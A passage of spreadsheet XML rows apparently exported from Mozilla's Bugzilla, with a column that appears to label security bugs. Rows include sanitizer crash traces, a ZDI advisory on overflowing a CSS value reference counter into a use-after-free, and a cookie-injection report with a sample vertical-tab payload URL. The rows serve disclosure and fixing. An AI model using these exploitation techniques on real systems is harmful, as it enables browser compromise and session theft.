    #23 0x7fc1ce4b6836 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JSScript*&gt;) /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:266:8
    #24 0x7fc1d2d14a74 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2321:25
    #25 0x7fc1d2d0e4b9 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1950:10
    #26 0x7fc1d2d0b8e7 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1591:10
    #27 0x7fc1d2ceea7e in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1310:10
    #28 0x7fc1d2cedb99 in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:141:18
    #29 0x7fc1cd26a87b in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:247:18
    #30 0x7fc1cd26a87b in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:736
    #31 0x7fc1cd263d74 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:540:7
    #32 0x7fc1cd26fc6b in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:131:20
    #33 0x7fc1cb2fd320 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/gfx/gl/GLContext.h:216:35 in ~TlsScope
Shadow bytes around the buggy address:
  0x0c3c80002040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c80002050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c80002060: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c3c80002070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3c80002080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c3c80002090: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c3c800020a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c800020b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c800020c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c800020d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c800020e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21389==ABORTING</t>
        </is>
      </c>
      <c r="X4792" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4793">
      <c r="A4793" t="n">
        <v>1120655</v>
      </c>
      <c r="B4793" t="inlineStr">
        <is>
          <t>2015-01-12 14:05:54 -0800</t>
        </is>
      </c>
      <c r="C4793" t="inlineStr">
        <is>
          <t>Make the analysis detect compartment iterator invalidation</t>
        </is>
      </c>
      <c r="D4793" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:45 -0700</t>
        </is>
      </c>
      <c r="E4793" t="n">
        <v>1</v>
      </c>
      <c r="F4793" t="n">
        <v>1</v>
      </c>
      <c r="G4793" t="n">
        <v>3</v>
      </c>
      <c r="H4793" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4793" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4793" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K4793" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4793" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4793" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4793" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4793" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4793" t="inlineStr">
        <is>
          <t>[asan][adv-main38+][adv-esr31.7+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4793" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4793" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4793" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T4793" t="n">
        <v>1</v>
      </c>
      <c r="U4793" t="n">
        <v>0</v>
      </c>
      <c r="V4793" t="n">
        <v>49</v>
      </c>
      <c r="W4793" t="inlineStr">
        <is>
          <t>Bug 1119579 found a case where we are iterating over the list of compartments while potentially modifying it. The hazard analysis can be modified to detect this case, since the main ways the list could be modified are (1) a garbage collection collecting one or more of the compartments and (2) running JS script code that creates new compartments. Running script can always GC, so the same mechanism can be used for both: label CompartmentsIter a GCPointer so the analysis will complain if you can GC while it is alive.</t>
        </is>
      </c>
      <c r="X4793" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4794">
      <c r="A4794" t="n">
        <v>545755</v>
      </c>
      <c r="B4794" t="inlineStr">
        <is>
          <t>2010-02-11 14:45:50 -0800</t>
        </is>
      </c>
      <c r="C4794" t="inlineStr">
        <is>
          <t>Update Mozilla stable branches to NSS 3.12.6 and minimal support for RFC 5746</t>
        </is>
      </c>
      <c r="D4794" t="inlineStr">
        <is>
          <t>2010-04-14 20:15:38 -0700</t>
        </is>
      </c>
      <c r="E4794" t="n">
        <v>1</v>
      </c>
      <c r="F4794" t="n">
        <v>1</v>
      </c>
      <c r="G4794" t="n">
        <v>3</v>
      </c>
      <c r="H4794" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4794" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4794" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K4794" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L4794" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4794" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4794" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4794" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4794" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q4794" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4794" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4794" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4794" t="n">
        <v>1</v>
      </c>
      <c r="U4794" t="n">
        <v>0</v>
      </c>
      <c r="V4794" t="n">
        <v>24</v>
      </c>
      <c r="W4794" t="inlineStr">
        <is>
          <t>I'm filing a separate bug for branch-landing, because we want a slightly different mix of patches in comparison to what we do on trunk = mozilla-central.
We'd like to land NSS 3.12.6 as per bug 527659 and necessary configure and PSM makefile tweaks, which includes the patch to disable (NSS-new) support for TLS-compression and the compilation fix for moz-sqlite from bug 519550 on top of that NSS release.
We'd like to include the error string addition from bug 540332, however, because of the localization problem on stable branches, we'll potentially land only half of that patch on the stable branch (string error codes yes, human readable strings maybe not).
We'd like to include the patch v6 from bug 535649, however, with a difference in preferences. More specifically, we might not yet want to change the default behaviour regarding renegotiation on old-protocol SSL/TLS sockets. We consider to use:
pref("security.ssl.allow_unrestricted_renego_everywhere__temporarily_available_pref", true);
This will still allow any kind of connections, even the few unsafe renegotiations that we're able to detect, but we'll start spamming the error console, reporting the not-yet-upgraded sites to users.
I'll make a combination of patches and attach them.
I'll not ask for reviews of patches, as the patches will be identical besides the two minor changes/omissions. I'll rather ask a PSM peer to state that this procedure is OK for the stable branches.
Dan, Johnathan, I think this is what you consider the reasonable approach, but please let me know if I'm wrong.
Which branches?
I think we want 
  mozilla-1.9.2 for Firefox 3.6.x
and
  mozilla-1.9.1 for Firefox 3.5.x
(which will also affect Thunderbird 3 et. al.)
I believe we're targetting mid-end March, 3.5.9 and 3.6.3</t>
        </is>
      </c>
      <c r="X4794" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4795">
      <c r="A4795" t="n">
        <v>1843758</v>
      </c>
      <c r="B4795" t="inlineStr">
        <is>
          <t>2023-07-16 04:01:32 -0700</t>
        </is>
      </c>
      <c r="C4795" t="inlineStr">
        <is>
          <t>.xll file extension = A malicious attack using abusing the XLL File starts with the delivery of a malicious file with the extension "XLL"</t>
        </is>
      </c>
      <c r="D4795" t="inlineStr">
        <is>
          <t>2024-05-30 11:12:34 -0700</t>
        </is>
      </c>
      <c r="E4795" t="n">
        <v>1</v>
      </c>
      <c r="F4795" t="n">
        <v>1</v>
      </c>
      <c r="G4795" t="n">
        <v>2</v>
      </c>
      <c r="H4795" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4795" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4795" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K4795" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4795" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4795" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4795" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4795" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4795" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main117+] [adv-esr115.2+] [adv-esr102.15+]</t>
        </is>
      </c>
      <c r="Q4795" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4795" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4795" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T4795" t="n">
        <v>1</v>
      </c>
      <c r="U4795" t="n">
        <v>0</v>
      </c>
      <c r="V4795" t="n">
        <v>28</v>
      </c>
      <c r="W4795" t="inlineStr">
        <is>
          <t>Firefox Version: [116.0b5] + [117.0a1]
Operating System: [Windows 10] (64-bit)
.xll = An XLL file is an add-in used by Microsoft Excel
It is the Excel Add-In file, that provides a way to use third-party tools and functions within Microsoft Excel. The third-party code can be C/C++ .NET code inside the Excel environment. In fact, despite the Excel icon, the XLL file is a Dynamic Linked Library, a binary executable file.
Cisco Talos investigates another vector for introduction of malicious code to Microsoft Excel—malicious add-ins, specifically XLL files.
.xll Blocked In Outlook Attachment 
This File is Already Blocklisted in Chrome &amp; Edge Browsers
The researchers are saying this technique is Xll particularly dangerous because the victims only need one click to compromise their endpoints. 
Ref : https://www.bleepingcomputer.com/news/microsoft/microsoft-365-to-block-downloaded-excel-xll-add-ins-to-boost-security/
This File is Already Blocklisted in Chrome &amp; Edge Browsers
it's better to Add Popop Warning [ Executable files may contain viruses or other malicious code that could harm your computer]
To .xll file To Keep Safe System from malicious file/code</t>
        </is>
      </c>
      <c r="X4795" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4796">
      <c r="A4796" t="n">
        <v>1191423</v>
      </c>
      <c r="B4796" t="inlineStr">
        <is>
          <t>2015-08-05 10:37:41 -0700</t>
        </is>
      </c>
      <c r="C4796" t="inlineStr">
        <is>
          <t>allowing vertical tab in cookies leads to cookie injection on some servers</t>
        </is>
      </c>
      <c r="D4796" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:06 -0700</t>
        </is>
      </c>
      <c r="E4796" t="n">
        <v>1</v>
      </c>
      <c r="F4796" t="n">
        <v>1</v>
      </c>
      <c r="G4796" t="n">
        <v>3</v>
      </c>
      <c r="H4796" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4796" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4796" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K4796" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L4796" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4796" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4796" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4796" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4796" t="inlineStr">
        <is>
          <t>[adv-main43+]</t>
        </is>
      </c>
      <c r="Q4796" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4796" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4796" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T4796" t="n">
        <v>1</v>
      </c>
      <c r="U4796" t="n">
        <v>0</v>
      </c>
      <c r="V4796" t="n">
        <v>50</v>
      </c>
      <c r="W4796" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Steps to reproduce:
Description:
Firefox allows storing vertical tabs (ASCII 11) in cookies being set.
When later replayed by the browser, they can be interrupted by parser as a new line
This allows setting arbitrary cookies for user.
Example case:
1) 
User visits http://www.doyoulikepizza.com, it asks of course do you like pizza?
It parses this user submited data and stores it in a cookie named likespizza.
This data is cleaned for xss, or injection but allows through a vertical tab since there is no harm IE, and Chrome do not allow saving vertical tabs in cookies.
This cookie is roughly stored in the jar as:
likespizza:true;{vertialtab}currentsessionpassword:12345678
2) 
Malicious user sends link which injects value to set likespizza to create user cookie;
http://www.doyoulikepizza.com?pizzaparty.php?likespizza=true;{verticaltab}currentsessionpassword:12345678;
3) Impact:
When victum vists http://www.doyoulikepizza.com firefox sends the current stored cookie for doyoulikepizza.com
When we visit the site we should have the vertical tab just be parsed as a regular character
GET / http/1.0
Host: doyoulikepizza.com
Cookie: likespizza:true;{vertialtab}currentsession:12345678
But with the middle parser Nginx / lighttp / apache / django etc might parses the vertical tab as a /n or /r so we get a,
GET / http/1.0
Host: doyoulikepizza.com
Cookie: likespizza:true;
Cookie: currentsessionpassword:12345678;
Impact
Many sites facebook google etc, parse http only cookies from url or user submitted content, its an injection point for this type 
of exploit, the middle parser tried to be helpful but can't be trusted to properly parse the vertical tab.
Suggestion:
Firefox should filter non standard characters from cookie data, if other browsers do not support them then it is unlikely a developer will
use these characters in cookie data, also if wanted to be used we can base64 encode the data for the cookie to keep it safe and return the characters vertical tab etc inside.</t>
        </is>
      </c>
      <c r="X4796" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4797">
      <c r="A4797" t="n">
        <v>1395254</v>
      </c>
      <c r="B4797" t="inlineStr">
        <is>
          <t>2017-08-30 10:45:53 -0700</t>
        </is>
      </c>
      <c r="C4797" t="inlineStr">
        <is>
          <t>Consume TaskCluster events from the standard Pulse exchanges rather than via taskcluster-treeherder</t>
        </is>
      </c>
      <c r="D4797" t="inlineStr">
        <is>
          <t>2019-08-07 07:23:24 -0700</t>
        </is>
      </c>
      <c r="E4797" t="n">
        <v>1</v>
      </c>
      <c r="F4797" t="n">
        <v>1</v>
      </c>
      <c r="G4797" t="n">
        <v>7</v>
      </c>
      <c r="H4797" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4797" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4797" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K4797" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4797" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4797" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4797" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4797" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4797" t="inlineStr"/>
      <c r="Q4797" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4797" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4797" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4797" t="n">
        <v>1</v>
      </c>
      <c r="U4797" t="n">
        <v>0</v>
      </c>
      <c r="V4797" t="n">
        <v>41</v>
      </c>
      <c r="W4797" t="inlineStr">
        <is>
          <t>(In reply to Jonas Finnemann Jensen (:jonasfj) from 1066272 comment #9)
&gt; Note: There are two ways to get this data:
...
&gt; B) Delete taskcluster-treeherder an ingest messages from taskcluster
&gt; directly in treeherder.
&gt;    Since taskcluster-treeherder is effectively just a rewriting messages
&gt; specifically for treeherder,
&gt;    and TC is probably the primary source of input for TH these days.
&gt;    Given that TC exchanges are stable and all messages are verified against
&gt; documented schemas,
&gt;    this wouldn't create tons of bugs.
We should just switch to consuming the messages directly to remove another layer of complexity that needs maintaining. To do this, we'll have to move the transformations performed by taskcluster-treeherder into Treeherder - though this will be a good thing, since it will let us later refactor and remove buildbot-isms that had to be added to taskcluster-treeherder so that Treeherder could handle the payloads.
https://github.com/taskcluster/taskcluster-treeherder</t>
        </is>
      </c>
      <c r="X4797" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4798">
      <c r="A4798" t="n">
        <v>762280</v>
      </c>
      <c r="B4798" t="inlineStr">
        <is>
          <t>2012-06-06 15:37:21 -0700</t>
        </is>
      </c>
      <c r="C4798" t="inlineStr">
        <is>
          <t>use after free in js::gc::MapAllocToTraceKind</t>
        </is>
      </c>
      <c r="D4798" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:31 -0700</t>
        </is>
      </c>
      <c r="E4798" t="n">
        <v>1</v>
      </c>
      <c r="F4798" t="n">
        <v>1</v>
      </c>
      <c r="G4798" t="n">
        <v>3</v>
      </c>
      <c r="H4798" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4798" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4798" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4798" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4798" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4798" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4798" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4798" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4798" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+] new in Fx14</t>
        </is>
      </c>
      <c r="Q4798" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4798" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4798" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T4798" t="n">
        <v>1</v>
      </c>
      <c r="U4798" t="n">
        <v>0</v>
      </c>
      <c r="V4798" t="n">
        <v>33</v>
      </c>
      <c r="W4798" t="inlineStr">
        <is>
          <t>Created attachment 630740
Testcase, from mutation of existing long test.
Reproduces on trunk.
20120605092342
http://hg.mozilla.org/mozilla-central/rev/c76497029f0d
=================================================================
==16916== ERROR: AddressSanitizer global-buffer-overflow on address 0x7fab8bdc5bb0 at pc 0x7fab8ab5e87d bp 0x7fab789bbdd0 sp 0x7fab789bbdc8
READ of size 4 at 0x7fab8bdc5bb0 thread T2
    #0 0x7fab8ab5e87d in js::gc::MapAllocToTraceKind(js::gc::AllocKind) /usr/local/google/home/aarya/firefox/src/js/src/jsfriendapi.cpp:0
    #1 0x7fab88c80099 in nsXMLHttpRequest::cycleCollection::Trace(void*, void (*)(void*, char const*, void*), void*) /usr/local/google/home/aarya/firefox/src/content/base/src/nsXMLHttpRequest.cpp:663
    #2 0x7fab88c7c9ca in nsXHREventTarget::cycleCollection::Traverse(void*, nsCycleCollectionTraversalCallback&amp;) /usr/local/google/home/aarya/firefox/src/content/base/src/nsXMLHttpRequest.cpp:287
    #3 0x7fab8a2cf99e in nsCycleCollector::MarkRoots(GCGraphBuilder&amp;) /usr/local/google/home/aarya/firefox/src/xpcom/base/nsCycleCollector.cpp:2054
    #4 0x7fab8a2d1db7 in nsCycleCollector::BeginCollection(nsICycleCollectorListener*) /usr/local/google/home/aarya/firefox/src/xpcom/base/nsCycleCollector.cpp:2760
    #5 0x7fab8a2d667e in nsCycleCollectorRunner::Run() /usr/local/google/home/aarya/firefox/src/xpcom/base/nsCycleCollector.cpp:3049
    #6 0x7fab8a2b0824 in nsThread::ProcessNextEvent(bool, bool*) /usr/local/google/home/aarya/firefox/src/xpcom/threads/nsThread.cpp:624
    #7 0x7fab8a21e16d in NS_ProcessNextEvent_P(nsIThread*, bool) /usr/local/google/home/aarya/firefox/src/objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:213
    #8 0x7fab8a2aebbd in nsThread::ThreadFunc(void*) /usr/local/google/home/aarya/firefox/src/xpcom/threads/nsThread.cpp:256
    #9 0x7fab8edcf706 in _pt_root /usr/local/google/home/aarya/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:158
0x7fab8bdc5bb0 is located 0 bytes to the right of global variable 'js::gc::MapAllocToTraceKind(js::gc::AllocKind)::map (/usr/local/google/home/aarya/firefox/src/js/src/jsfriendapi.cpp)' (0x7fab8bdc5b60) of size 80
  'js::gc::MapAllocToTraceKind(js::gc::AllocKind)::map (/usr/local/google/home/aarya/firefox/src/js/src/jsfriendapi.cpp)' is ascii string ''
==16916== ABORTING
Stats: 186M malloced (195M for red zones) by 404853 calls
Stats: 46M realloced by 21407 calls
Stats: 156M freed by 274895 calls
Stats: 24M really freed by 46335 calls
Stats: 412M (105532 full pages) mmaped in 103 calls
  mmaps   by size class: 8:311277; 9:57337; 10:24570; 11:22517; 12:4096; 13:2560; 14:1792; 15:512; 16:640; 17:160; 18:208; 19:56; 20:20;
  mallocs by size class: 8:298456; 9:55207; 10:22104; 11:19974; 12:4008; 13:2088; 14:1570; 15:393; 16:638; 17:146; 18:196; 19:55; 20:18;
  frees   by size class: 8:188758; 9:43497; 10:18577; 11:16765; 12:2858; 13:1836; 14:1370; 15:330; 16:533; 17:126; 18:181; 19:50; 20:14;
  rfrees  by size class: 8:37269; 9:2590; 10:2242; 11:3443; 12:169; 13:216; 14:139; 15:48; 16:159; 17:29; 18:21; 19:9; 20:1;
Stats: malloc large: 415 small slow: 2219
Shadow byte and word:
  0x1ff5717b8b76: f9
  0x1ff5717b8b70: 00 00 00 00 00 00 f9 f9
More shadow bytes:
  0x1ff5717b8b50: 00 00 00 00 06 f9 f9 f9
  0x1ff5717b8b58: f9 f9 f9 f9 05 f9 f9 f9
  0x1ff5717b8b60: f9 f9 f9 f9 00 06 f9 f9
  0x1ff5717b8b68: f9 f9 f9 f9 00 00 00 00
=&gt;0x1ff5717b8b70: 00 00 00 00 00 00 f9 f9
  0x1ff5717b8b78: f9 f9 f9 f9 00 00 00 00
  0x1ff5717b8b80: 00 00 00 00 00 00 00 00
  0x1ff5717b8b88: 00 00 00 00 00 00 00 00
  0x1ff5717b8b90: 00 00 00 00 00 00 00 00</t>
        </is>
      </c>
      <c r="X4798" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4799">
      <c r="A4799" t="n">
        <v>440230</v>
      </c>
      <c r="B4799" t="inlineStr">
        <is>
          <t>2008-06-18 18:27:05 -0700</t>
        </is>
      </c>
      <c r="C4799" t="inlineStr">
        <is>
          <t>Firefox CSSValue Array Memory Corruption Vulnerability</t>
        </is>
      </c>
      <c r="D4799" t="inlineStr">
        <is>
          <t>2009-01-15 21:21:59 -0800</t>
        </is>
      </c>
      <c r="E4799" t="n">
        <v>1</v>
      </c>
      <c r="F4799" t="n">
        <v>1</v>
      </c>
      <c r="G4799" t="n">
        <v>3</v>
      </c>
      <c r="H4799" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4799" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4799" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K4799" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4799" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4799" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4799" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4799" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4799" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q4799" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4799" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4799" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4799" t="n">
        <v>1</v>
      </c>
      <c r="U4799" t="n">
        <v>0</v>
      </c>
      <c r="V4799" t="n">
        <v>43</v>
      </c>
      <c r="W4799" t="inlineStr">
        <is>
          <t>Created attachment 325682
zipped PoC (multiple files) from ZDI
ZDI submitted the following advisory to us via mail to security@mozilla.org
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following 
products:
    Mozilla Firefox 2.0.x
    Mozilla Firefox 3.0.x
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.
The specific flaw exists in the browser's handling reference counters to
the nsCSSValue:Array class. Creating more then 65,535 references will
overflow a 16-bit reference counter and therefore result in an erroneous
free() while the object still exists. Properly manipulated this can
result in arbitrary code execution under the context of the current
user.
Most reference counters are implemented as unsigned longs and can not be
feasible overflowed with too many reference. However, the
nsCSSValue::Array class uses a 16-bit wide value,
layout/style/nsCSSValue.h (lines 321-335):
void AddRef() {
  ++mRefCnt;
  NS_LOG_ADDREF(this, mRefCnt, "nsCSSValue::Array", sizeof(*this));
}
void Release() {
  --mRefCnt;
  NS_LOG_RELEASE(this, mRefCnt, "nsCSSValue::Array");
  if (mRefCnt == 0)
    delete this;
}
private:
  PRUint16 mRefCnt;
  PRUint16 mCount;
An attacker can create an arbitrary number of references to this object
by creating a style definition with counter-increment, counter-reset,
cursor or text-shadow attribute. Setting one of those attributes to an
arbitrary HTML object creates a reference to this object.
Creating more than 65535 HTML objects with reference to this style
definition will overflow the reference counter, which will lead to a
freeing of the object whilst references to it still exist.
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * Anonymous</t>
        </is>
      </c>
      <c r="X4799" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4800">
      <c r="A4800" t="n">
        <v>1399134</v>
      </c>
      <c r="B4800" t="inlineStr">
        <is>
          <t>2017-09-12 07:43:40 -0700</t>
        </is>
      </c>
      <c r="C4800" t="inlineStr">
        <is>
          <t>[tracker] Add Zerda Product</t>
        </is>
      </c>
      <c r="D4800" t="inlineStr">
        <is>
          <t>2018-04-10 18:45:21 -0700</t>
        </is>
      </c>
      <c r="E4800" t="n">
        <v>1</v>
      </c>
      <c r="F4800" t="n">
        <v>1</v>
      </c>
      <c r="G4800" t="n">
        <v>5</v>
      </c>
      <c r="H4800" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4800" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4800" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4800" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4800" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4800" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4800" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4800" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4800" t="inlineStr"/>
      <c r="Q4800" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4800" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4800" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4800" t="n">
        <v>1</v>
      </c>
      <c r="U4800" t="n">
        <v>0</v>
      </c>
      <c r="V4800" t="n">
        <v>3</v>
      </c>
      <c r="W4800" t="inlineStr">
        <is>
          <t>This bug tracks enabling the Zerda product on SUMO.</t>
        </is>
      </c>
      <c r="X4800" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4801">
      <c r="A4801" t="n">
        <v>322215</v>
